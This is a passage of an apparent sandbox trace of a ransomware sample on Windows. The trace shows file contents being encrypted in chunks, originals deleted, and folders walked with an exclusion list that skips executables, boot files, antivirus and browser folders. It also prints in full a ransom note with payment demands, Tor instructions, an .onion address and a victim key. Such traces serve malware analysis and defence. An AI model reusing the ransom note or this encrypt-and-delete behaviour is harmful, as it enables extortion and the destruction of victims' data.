pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.379] GetLastError () returned 0x0 [0143.379] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.379] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.379] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.379] GetLastError () returned 0x0 [0143.379] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.379] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.379] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.379] GetLastError () returned 0x0 [0143.379] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.379] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.379] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.379] GetLastError () returned 0x0 [0143.379] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.379] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.379] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.379] GetLastError () returned 0x0 [0143.380] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.380] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.380] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.380] GetLastError () returned 0x0 [0143.380] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.380] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.380] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.380] GetLastError () returned 0x0 [0143.380] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.380] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.380] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.380] GetLastError () returned 0x0 [0143.380] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.380] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.380] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.380] GetLastError () returned 0x0 [0143.380] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.380] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.380] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.380] GetLastError () returned 0x0 [0143.380] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.380] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.380] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.380] GetLastError () returned 0x0 [0143.380] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.380] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.381] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.381] GetLastError () returned 0x0 [0143.381] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.381] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0xc0, lpOverlapped=0x0) returned 1 [0143.381] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0xc0, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0xd0) returned 1 [0143.381] GetLastError () returned 0x0 [0143.381] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0xd0, lpOverlapped=0x0) returned 1 [0143.381] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x0, lpOverlapped=0x0) returned 1 [0143.381] WriteFile (in: hFile=0x284, lpBuffer=0x2882640*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesWritten=0x2d7eb1c*=0x0, lpOverlapped=0x0) returned 1 [0143.381] CloseHandle (hObject=0x288) returned 1 [0143.381] CloseHandle (hObject=0x284) returned 1 [0143.382] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb")) returned 0x20 [0143.382] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB", dwFileAttributes=0x20) returned 1 [0143.382] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 1 [0143.382] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb")) returned 1 [0143.383] CryptDestroyKey (hKey=0x8be8b8) returned 1 [0143.383] wcslen (_String="OK") returned 0x2 [0143.383] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.383] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.383] CryptDestroyKey (hKey=0x8be478) returned 1 [0143.383] CryptDestroyHash (hHash=0x8be838) returned 1 [0143.383] CryptReleaseContext (hProv=0x8becf8, dwFlags=0x0) returned 1 [0143.383] FindNextFileW (in: hFindFile=0x8be638, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 0 [0143.383] GetLastError () returned 0x12 [0143.383] FindClose (in: hFindFile=0x8be638 | out: hFindFile=0x8be638) returned 1 [0143.383] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\Recovers your files.html" (normalized: "c:\\program files\\common files\\designer\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0143.384] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0143.384] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0143.385] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0143.385] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.385] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.385] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0143.385] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.385] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.385] wcslen (_String="\\\\?\\") returned 0x4 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*.exe") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*.dll") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*.lnk") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*.bat") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*.ini") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*.msi") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*.scf") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*pagefile.sys*") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*NTUSER.DAT*") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*AppData*") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*\\winrar\\*") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*\\java\\*") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*\\windows\\*") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*\\ESET\\*") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*\\AVG\\*") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*\\AVIRA\\*") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0143.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*Atheros*") returned 0 [0143.386] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*Realtek*") returned 0 [0143.386] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*bootmgr*") returned 0 [0143.386] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*boot*") returned 0 [0143.386] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*boot*") returned 0 [0143.386] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*CONFIG.SYS*") returned 0 [0143.386] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*IO.SYS*") returned 0 [0143.386] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*MSDOS.SYS*") returned 0 [0143.386] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*NTDETECT.COM*") returned 0 [0143.386] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*ntldr*") returned 0 [0143.386] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*chrome*") returned 0 [0143.386] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*opera*") returned 0 [0143.386] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\*", pszSpec="*firefox*") returned 0 [0143.386] wcslen (_String="\\\\?\\") returned 0x4 [0143.386] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\*", lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 0x8be478 [0143.386] wcscmp (_String1=".", _String2=".") returned 0 [0143.386] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0143.386] wcscmp (_String1="..", _String2=".") returned 1 [0143.386] wcscmp (_String1="..", _String2="..") returned 0 [0143.386] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0143.386] wcscmp (_String1="ClickToRun", _String2=".") returned 1 [0143.386] wcscmp (_String1="ClickToRun", _String2="..") returned 1 [0143.386] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0143.386] wcscmp (_String1="ink", _String2=".") returned 1 [0143.386] wcscmp (_String1="ink", _String2="..") returned 1 [0143.386] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0143.386] wcscmp (_String1="MSInfo", _String2=".") returned 1 [0143.386] wcscmp (_String1="MSInfo", _String2="..") returned 1 [0143.386] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0143.386] wcscmp (_String1="OFFICE16", _String2=".") returned 1 [0143.386] wcscmp (_String1="OFFICE16", _String2="..") returned 1 [0143.386] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0143.386] wcscmp (_String1="OfficeSoftwareProtectionPlatform", _String2=".") returned 1 [0143.386] wcscmp (_String1="OfficeSoftwareProtectionPlatform", _String2="..") returned 1 [0143.387] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0143.387] wcscmp (_String1="Source Engine", _String2=".") returned 1 [0143.387] wcscmp (_String1="Source Engine", _String2="..") returned 1 [0143.387] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0143.387] wcscmp (_String1="Stationery", _String2=".") returned 1 [0143.387] wcscmp (_String1="Stationery", _String2="..") returned 1 [0143.387] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0143.387] wcscmp (_String1="TextConv", _String2=".") returned 1 [0143.387] wcscmp (_String1="TextConv", _String2="..") returned 1 [0143.387] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0143.387] wcscmp (_String1="Triedit", _String2=".") returned 1 [0143.387] wcscmp (_String1="Triedit", _String2="..") returned 1 [0143.387] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0143.387] wcscmp (_String1="VC", _String2=".") returned 1 [0143.387] wcscmp (_String1="VC", _String2="..") returned 1 [0143.387] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0143.387] wcscmp (_String1="VGX", _String2=".") returned 1 [0143.387] wcscmp (_String1="VGX", _String2="..") returned 1 [0143.387] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0143.387] wcscmp (_String1="VSTO", _String2=".") returned 1 [0143.387] wcscmp (_String1="VSTO", _String2="..") returned 1 [0143.387] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 0 [0143.387] GetLastError () returned 0x12 [0143.387] FindClose (in: hFindFile=0x8be478 | out: hFindFile=0x8be478) returned 1 [0143.387] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0143.387] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.387] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.387] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0143.387] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.387] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.387] wcslen (_String="\\\\?\\") returned 0x4 [0143.387] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*.exe") returned 0 [0143.387] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*.dll") returned 0 [0143.387] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*.lnk") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*.bat") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*.ini") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*.msi") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*.scf") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*pagefile.sys*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*NTUSER.DAT*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*AppData*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*\\winrar\\*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*\\java\\*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*\\windows\\*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*\\ESET\\*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*\\AVG\\*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*\\AVIRA\\*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*Atheros*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*Realtek*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*bootmgr*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*boot*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*boot*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*CONFIG.SYS*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*IO.SYS*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*MSDOS.SYS*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*NTDETECT.COM*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*ntldr*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*chrome*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*opera*") returned 0 [0143.388] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", pszSpec="*firefox*") returned 0 [0143.388] wcslen (_String="\\\\?\\") returned 0x4 [0143.388] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", lpFindFileData=0x2d7e89c | out: 